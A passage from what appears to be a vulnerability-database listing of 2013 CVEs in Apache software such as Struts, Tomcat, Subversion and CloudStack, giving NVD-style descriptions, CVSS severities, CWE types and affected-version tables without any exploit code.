apache struts 2.0.2
apache struts 2.3.4.1
apache struts 2.0.9
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.3.14.1
apache struts 2.0.11
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.0.8
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.3.4
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.0.3
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.0.12
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.0.14
apache struts 2.3.1.2
apache struts 2.0.0
apache struts 2.2.3
CVE-2013-2249 HIGH

mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
CVE-2013-2250 HIGH

Apache Open For Business Project (aka OFBiz) 10.04.01 through 10.04.05, 11.04.01 through 11.04.02, and 12.04.01 allows remote attackers to execute arbitrary Unified Expression Language (UEL) functions via JUEL metacharacters in unspecified parameters, related to nested expressions.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache ofbiz 10.04.01
apache ofbiz 10.04.03
apache ofbiz 11.04.01
apache ofbiz 10.04.05
apache ofbiz 10.04.04
apache ofbiz 11.04.02
apache ofbiz 12.04.01
apache ofbiz 10.04.02
CVE-2013-2251 HIGH

Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-74,CWE-74,

Products Affected

Vendor Product Version
apache struts *
fujitsu interstage_business_process_manager_analytics 12.1
fujitsu gp-s_firmware -
oracle siebel_apps_-_e-billing 6.2
apache archiva 1.2
fujitsu sparc_firmware -
apache archiva 1.2.2
oracle siebel_apps_-_e-billing 6.1.1
fujitsu primepower_firmware -
fujitsu primergy_firmware -
oracle siebel_apps_-_e-billing 6.1
fujitsu interstage_business_process_manager_analytics 12.0
fujitsu gp5000_firmware -
apache archiva *
fujitsu gp7000f_firmware -
CVE-2013-2254 MEDIUM

The deepGetOrCreateNode function in impl/operations/AbstractCreateOperation.java in org.apache.sling.servlets.post.bundle 2.2.0 and 2.3.0 in Apache Sling does not properly handle a NULL value that returned when the session does not have permissions to the root node, which allows remote attackers to cause a denial of service (infinite loop) via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache org.apache.sling.servlets.post 2.3.0
apache org.apache.sling.servlets.post 2.2.0
CVE-2013-2756 MEDIUM

Apache CloudStack 4.0.0 before 4.0.2 and Citrix CloudPlatform (formerly Citrix CloudStack) 3.0.x before 3.0.6 Patch C allows remote attackers to bypass the console proxy authentication by leveraging knowledge of the source code.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
citrix cloudplatform 3.0.4
citrix cloudplatform 3.0
apache cloudstack 4.0.0
citrix cloudplatform 3.0.3
citrix cloudplatform 3.0.5
apache cloudstack 4.0.2
apache cloudstack 4.0.1
citrix cloudplatform 3.0.6
CVE-2013-2758 MEDIUM

Apache CloudStack 4.0.0 before 4.0.2 and Citrix CloudPlatform (formerly Citrix CloudStack) 3.0.x before 3.0.6 Patch C uses a hash of a predictable sequence, which makes it easier for remote attackers to guess the console access URL via a brute force attack.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
citrix cloudplatform 3.0.4
citrix cloudplatform 3.0
apache cloudstack 4.0.0
citrix cloudplatform 3.0.3
citrix cloudplatform 3.0.5
apache cloudstack 4.0.2
apache cloudstack 4.0.1
citrix cloudplatform 3.0.6
CVE-2013-3060 MEDIUM

The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache activemq 4.1.0
apache activemq 5.6.0
apache activemq *
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 4.0
apache activemq 4.0.2
apache activemq 5.3.0
apache activemq 4.0.1
apache activemq 5.0.0
apache activemq 5.5.1
apache activemq 5.2.0
apache activemq 5.4.1
apache activemq 4.1.1
CVE-2013-4002 HIGH

XMLscanner.java in Apache Xerces2 Java Parser before 2.12.0, as used in the Java Runtime Environment (JRE) in IBM Java 5.0 before 5.0 SR16-FP3, 6 before 6 SR14, 6.0.1 before 6.0.1 SR6, and 7 before 7 SR5 as well as Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, Java SE Embedded 7u40 and earlier, and possibly other products allows remote attackers to cause a denial of service via vectors related to XML attribute names.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
ibm java 6.0.13.2
ibm tivoli_application_dependency_discovery_manager 7.2.2
ibm java 7.0.1.0
ibm host_on-demand 11.0.6
ibm java 7.0.2.0
ibm java 5.0.11.1
ibm host_on-demand 11.0
suse linux_enterprise_server 9
ibm java 6.0.12.0
ibm host_on-demand 11.0.1
suse linux_enterprise_desktop 11
suse linux_enterprise_server 10
ibm sterling_b2b_integrator 5.1
ibm java 5.0.12.3
oracle jre 1.5.0
ibm java 5.0.15.0
ibm host_on-demand 11.0.3
ibm java 7.0.3.0
canonical ubuntu_linux 13.04
canonical ubuntu_linux 13.10
ibm java 5.0.12.2
ibm host_on-demand 11.0.2
oracle jre 1.7.0
ibm java 5.0.14.0
ibm java 7.0.4.2
ibm java 5.0.11.0
ibm java 6.0.8.0
ibm java 6.0.4.0
ibm java 5.0.0.0
suse linux_enterprise_java 11
ibm java 6.0.10.1
opensuse opensuse 12.3
ibm java 5.0.12.5
ibm java 6.0.11.0
suse linux_enterprise_java 10
ibm java 5.0.12.4
ibm host_on-demand 11.0.7
ibm java 6.0.3.0
ibm host_on-demand 11.0.5.1
ibm java 5.0.11.2
ibm java 5.0.16.2
ibm java 6.0.9.0
ibm sterling_file_gateway 2.1
ibm java 6.0.0.0
ibm host_on-demand 11.0.6.1
ibm host_on-demand 11.0.5
ibm java 5.0.12.1
canonical ubuntu_linux 12.04
oracle jre 1.6.0
ibm java 5.0.16.1
ibm java 5.0.12.0
suse linux_enterprise_desktop 10
ibm host_on-demand 11.0.8
canonical ubuntu_linux 12.10
ibm java 6.0.5.0
ibm sterling_file_gateway 2.2
ibm sterling_b2b_integrator 5.2
suse linux_enterprise_server 11
suse linux_enterprise_sdk 11
canonical ubuntu_linux 10.04
ibm java 6.0.9.1
ibm java 6.0.2.0
oracle jdk 1.5.0
ibm java 7.0.0.0
ibm java 6.0.7.0
ibm java 6.0.6.0
ibm java 5.0.13.0
ibm java 6.0.8.1
ibm java 7.0.4.0
oracle jdk 1.7.0
ibm java 7.0.4.1
ibm sterling_b2b_integrator 5.2.4
apache xerces2_java *
ibm java 6.0.1.0
ibm host_on-demand 11.0.4
ibm java 6.0.9.2
ibm java 5.0.16.0
oracle jdk 1.6.0
opensuse opensuse 12.2
oracle jrockit *
ibm java 6.0.10.0
ibm java 6.0.13.1
ibm java 6.0.13.0
CVE-2013-4131 MEDIUM

The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apache subversion 1.7.1
apache subversion 1.8.0
apache subversion 1.7.8
apache subversion 1.7.10
apache subversion 1.7.5
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.7.6
apache subversion 1.7.9
apache subversion 1.7.4
apache subversion 1.7.7
CVE-2013-4156 MEDIUM

Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2013-4171 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.2 allow remote attackers to inject arbitrary web script or HTML via vectors related to the search results in the (1) RSS and (2) Atom feed templates.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache roller 4.0.1
apache roller *
apache roller 5.0
apache roller 4.0
CVE-2013-4212 MEDIUM

Certain getText methods in the ActionSupport controller in Apache Roller before 5.0.2 allow remote attackers to execute arbitrary OGNL expressions via the first or second parameter, as demonstrated by the pageTitle parameter in the !getPageTitle sub-URL to roller-ui/login.rol, which uses a subclass of UIAction, aka "OGNL Injection."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache roller 4.0.1
apache roller *
apache roller 5.0
apache roller 4.0
CVE-2013-4246 MEDIUM

libsvn_fs_fs/fs_fs.c in Apache Subversion 1.8.x before 1.8.2 might allow remote authenticated users with commit access to corrupt FSFS repositories and cause a denial of service or obtain sensitive information by editing packed revision properties.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache subversion 1.8.0
apache subversion 1.8.1
CVE-2013-4262 LOW

svnwcsub.py in Subversion 1.8.0 before 1.8.3, when using the --pidfile option and running in foreground mode, allows local users to gain privileges via a symlink attack on the pid file. NOTE: this issue was SPLIT due to different affected versions (ADT3). The irkerbridge.py issue is covered by CVE-2013-7393.

CVSS 2.0

Severity: LOW

Problem Type: CWE-59,

Products Affected

Vendor Product Version
apache subversion 1.8.2
apache subversion 1.8.0
apache subversion 1.8.1
CVE-2013-4277 LOW

Svnserve in Apache Subversion 1.4.0 through 1.7.12 and 1.8.0 through 1.8.1 allows local users to overwrite arbitrary files or kill arbitrary processes via a symlink attack on the file specified by the --pid-file option.

CVSS 2.0

Severity: LOW

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache subversion 1.4.0
apache subversion 1.6.18
apache subversion 1.8.0
apache subversion 1.6.6
apache subversion 1.5.3
apache subversion 1.6.11
apache subversion 1.7.11
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
apache subversion 1.7.4
apache subversion 1.5.6
apache subversion 1.6.17
apache subversion 1.4.3
apache subversion 1.6.20
apache subversion 1.7.5
apache subversion 1.6.12
apache subversion 1.6.13
apache subversion 1.7.12
apache subversion 1.6.3
apache subversion 1.6.5
apache subversion 1.5.8
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
apache subversion 1.7.3
apache subversion 1.5.5
apache subversion 1.6.21
apache subversion 1.5.7
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.5.2
apache subversion 1.8.1
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.9
apache subversion 1.7.6
apache subversion 1.6.19
apache subversion 1.7.9
apache subversion 1.5.4
apache subversion 1.6.23
apache subversion 1.4.2
apache subversion 1.4.6
apache subversion 1.7.1
apache subversion 1.4.5
apache subversion 1.6.7
apache subversion 1.4.4
apache subversion 1.7.10
apache subversion 1.6.10
apache subversion 1.6.1
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.4.1
CVE-2013-4286 MEDIUM

Apache Tomcat before 6.0.39, 7.x before 7.0.47, and 8.x before 8.0.0-RC3, when an HTTP connector or AJP connector is used, does not properly handle certain inconsistent HTTP request headers, which allows remote attackers to trigger incorrect identification of a request's length and conduct request-smuggling attacks via (1) multiple Content-Length headers or (2) a Content-Length header and a "Transfer-Encoding: chunked" header. NOTE: this vulnerability exists because of an incomplete fix for CVE-2005-2090.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 4.1.29
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 5.0.5
apache tomcat 1.1.3
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 7.0.44
apache tomcat 6.0.29
apache tomcat 4.0.3
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 7.0.33
apache tomcat 3.0
apache tomcat 6.0.36
apache tomcat 5.0.23
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 5.5.23
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 6.0.2
apache tomcat 5.5.35
apache tomcat 5.5.13
apache tomcat 5.5.8
apache tomcat 3.3.1a
apache tomcat 5.0.0
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 3.3.2
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 7.0.36
apache tomcat 5.0.26
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 5.0.12
apache tomcat 5.0.30
apache tomcat 6.0.13
apache tomcat 3.2.3
apache tomcat *
apache tomcat 5.0.9
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 5.0.29
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 6
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 5.5.2
apache tomcat 4.1.0
apache tomcat 7.0.27
apache tomcat 5.0.11
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 5.5.31
apache tomcat 5.0.4
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 3.3.1
apache tomcat 4.1.2
apache tomcat 5.5.34
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 8.0.0
apache tomcat 5.0.2
apache tomcat 5.5.14
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 4.1.1
apache tomcat 4.1.15
apache tomcat 3.2
apache tomcat 4.0.4
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 5.0.24
apache tomcat 6.0.1
apache tomcat 3.3
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 5.0.13
apache tomcat 7.0.41
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.0.28
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 3.1.1
apache tomcat 5.5.9
apache tomcat 7.0.31
apache tomcat 3.2.1
apache tomcat 4.0.1
apache tomcat 6.0.15
apache tomcat 5.5.32
apache tomcat 5.5.1
apache tomcat 7.0.17
apache tomcat 5.5.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 5.5.3
apache tomcat 5
apache tomcat 4.1.36
apache tomcat 5.0.7
apache tomcat 5.5.24
apache tomcat 4
apache tomcat 6.0.17
apache tomcat 7.0.25
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 5.0.21
apache tomcat 7.0.23
apache tomcat 7.0.19
apache tomcat 7.0.46
apache tomcat 7.0.29
apache tomcat 5.0.25
apache tomcat 5.0.10
apache tomcat 4.0.6
apache tomcat 7.0.20
apache tomcat 6.0.10
apache tomcat 5.0.6
apache tomcat 7.0.14
apache tomcat 7.0.10
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 3.2.2
apache tomcat 3.1
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 3.2.4
apache tomcat 5.0.18
apache tomcat 7.0.22
apache tomcat 5.0.1
apache tomcat 6.0.35
CVE-2013-4295 MEDIUM

The gadget renderer in Apache Shindig 2.5.0 for PHP allows remote attackers to obtain sensitive information via an XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache shindig 2.5.0
CVE-2013-4310 MEDIUM

Apache Struts 2.0.0 through 2.3.15.1 allows remote attackers to bypass access controls via a crafted action: prefix.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.3.4.1
apache struts 2.0.9
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.3.14.1
apache struts 2.0.11
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.0.8
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.3.4
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.0.3
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.0.12
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.0.14
apache struts 2.3.1.2
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.2.3
CVE-2013-4316 HIGH

Apache Struts 2.0.0 through 2.3.15.1 enables Dynamic Method Invocation by default, which has unknown impact and attack vectors.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-16,CWE-284,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache struts 2.0.2
oracle webcenter_sites 11.1.1.6.1
apache struts 2.0.9
apache struts 2.3.14.1
oracle flexcube_private_banking 12.0.1
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.1.1
oracle flexcube_private_banking 12.0.2
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.3
apache struts 2.1.8
apache struts 2.0.13
oracle flexcube_private_banking 2.2.0.1
oracle flexcube_private_banking 1.7
apache struts 2.0.12
apache struts 2.0.14
oracle flexcube_private_banking 3.0
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.0.11
oracle flexcube_private_banking 2.0
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
oracle mysql_enterprise_monitor *
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
oracle flexcube_private_banking 2.0.1
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
oracle webcenter_sites 11.1.1.8.0
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.1.2
apache struts 2.2.3
CVE-2013-4317 MEDIUM

In Apache CloudStack 4.1.0 and 4.1.1, when calling the CloudStack API call listProjectAccounts as a regular, non-administrative user, the user is able to see information for accounts other than their own.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache cloudstack 4.1.0
apache cloudstack 4.1.1
CVE-2013-4322 MEDIUM

Apache Tomcat before 6.0.39, 7.x before 7.0.50, and 8.x before 8.0.0-RC10 processes chunked transfer coding without properly handling (1) a large total amount of chunked data or (2) whitespace characters in an HTTP header value within a trailer field, which allows remote attackers to cause a denial of service by streaming data. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-3544.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 4.1.29
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 5.0.5
apache tomcat 1.1.3
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 7.0.44
apache tomcat 6.0.29
apache tomcat 4.0.3
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 7.0.33
apache tomcat 3.0
apache tomcat 6.0.36
apache tomcat 5.0.23
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 5.5.23
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 6.0.2
apache tomcat 5.5.35
apache tomcat 5.5.13
apache tomcat 5.5.8
apache tomcat 3.3.1a
apache tomcat 5.0.0
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 3.3.2
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 7.0.36
apache tomcat 5.0.26
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 5.0.12
apache tomcat 5.0.30
apache tomcat 6.0.13
apache tomcat 3.2.3
apache tomcat *
apache tomcat 5.0.9
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 5.0.29
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 6
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 5.5.2
apache tomcat 4.1.0
apache tomcat 7.0.27
apache tomcat 5.0.11
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 5.5.31
apache tomcat 5.0.4
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 3.3.1
apache tomcat 4.1.2
apache tomcat 5.5.34
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 8.0.0
apache tomcat 5.0.2
apache tomcat 5.5.14
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 4.1.1
apache tomcat 4.1.15
apache tomcat 3.2
apache tomcat 4.0.4
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 5.0.24
apache tomcat 6.0.1
apache tomcat 3.3
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 5.0.13
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.0.28
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 3.1.1
apache tomcat 5.5.9
apache tomcat 7.0.31
apache tomcat 3.2.1
apache tomcat 4.0.1
apache tomcat 6.0.15
apache tomcat 5.5.32
apache tomcat 5.5.1
apache tomcat 7.0.17
apache tomcat 5.5.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 5.5.3
apache tomcat 5
apache tomcat 4.1.36
apache tomcat 5.0.7
apache tomcat 5.5.24
apache tomcat 4
apache tomcat 6.0.17
apache tomcat 7.0.25
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 5.0.21
apache tomcat 7.0.23
apache tomcat 7.0.19
apache tomcat 7.0.46
apache tomcat 7.0.29
apache tomcat 5.0.25
apache tomcat 5.0.10
apache tomcat 4.0.6
apache tomcat 7.0.20
apache tomcat 6.0.10
apache tomcat 5.0.6
apache tomcat 7.0.14
apache tomcat 7.0.10
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 3.2.2
apache tomcat 3.1
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 3.2.4
apache tomcat 5.0.18
apache tomcat 7.0.22
apache tomcat 5.0.1
apache tomcat 6.0.35
CVE-2013-4330 MEDIUM

Apache Camel before 2.9.7, 2.10.0 before 2.10.7, 2.11.0 before 2.11.2, and 2.12.0 allows remote attackers to execute arbitrary simple language expressions by including "$simple{}" in a CamelFileName message header to a (1) FILE or (2) FTP producer.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache camel 1.6.2
apache camel 2.9.4
apache camel 2.9.5
apache camel 2.10.1
apache camel 2.8.4
apache camel 2.6.0
apache camel 2.10.4
apache camel 2.8.6
apache camel 1.6.1
apache camel 2.7.1
apache camel 2.9.1
apache camel 2.4.0
apache camel 2.8.0
apache camel 2.0.0
apache camel 2.9.0
apache camel 2.8.3
apache camel 2.10.3
apache camel 1.0.0
apache camel 2.1.0
apache camel 1.4.0
apache camel 1.1.0
apache camel 2.3.0
apache camel 2.11.1
apache camel 2.7.0
apache camel 1.2.0
apache camel 2.10.2
apache camel 2.8.2
apache camel 2.7.5
apache camel 2.7.4
apache camel 2.2.0
apache camel 1.6.0
apache camel 1.5.0
apache camel 1.3.0
apache camel 2.7.2
apache camel 2.5.0
apache camel *
apache camel 2.7.3
apache camel 2.10.5
apache camel 2.11.0
apache camel 2.12.0
apache camel 2.9.2
apache camel 2.10.0
apache camel 2.8.5
apache camel 1.6.4
apache camel 2.10.6
apache camel 1.6.3
apache camel 2.8.1
apache camel 2.9.3
CVE-2013-4352 MEDIUM

The cache_invalidate function in modules/cache/cache_storage.c in the mod_cache module in the Apache HTTP Server 2.4.6, when a caching forward proxy is enabled, allows remote HTTP servers to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger a missing hostname value.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.4.6
CVE-2013-4365 HIGH

Heap-based buffer overflow in the fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.9 for the Apache HTTP Server allows remote attackers to have an unspecified impact via unknown vectors.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,

Products Affected

Vendor Product Version
opensuse opensuse 12.3
opensuse opensuse 11.4
debian debian_linux 6.0
suse linux_enterprise_software_development_kit 11
debian debian_linux 7.0
opensuse opensuse 12.2
apache mod_fcgid *
suse cloud 1.0
suse cloud 2.0
CVE-2013-4366 HIGH

http/impl/client/HttpClientBuilder.java in Apache HttpClient 4.3.x before 4.3.1 does not ensure that X509HostnameVerifier is not null, which allows attackers to have unspecified impact via vectors involving hostname verification.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache httpclient 4.3
CVE-2013-4390 MEDIUM

Open redirect vulnerability in the AbstractAuthenticationFormServlet in the Auth Core (org.apache.sling.auth.core) bundle before 1.1.4 in Apache Sling allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the resource parameter, related to "a custom login form and XSS."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache sling_auth_core_component 1.0.4
apache sling *
apache sling_auth_core_component 1.0.2
apache sling_auth_core_component 1.1.0
apache sling_auth_core_component *
apache sling_auth_core_component 1.0.6
CVE-2013-4444 MEDIUM

Unrestricted file upload vulnerability in Apache Tomcat 7.x before 7.0.40, in certain situations involving outdated java.io.File code and a custom JMX configuration, allows remote attackers to execute arbitrary code by uploading and accessing a JSP file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 7.0.25
apache tomcat 7.0.36
apache tomcat 7.0.13
apache tomcat 7.0.38
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat *
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.29
apache tomcat 7.0.12
apache tomcat 7.0.34
apache tomcat 7.0.24
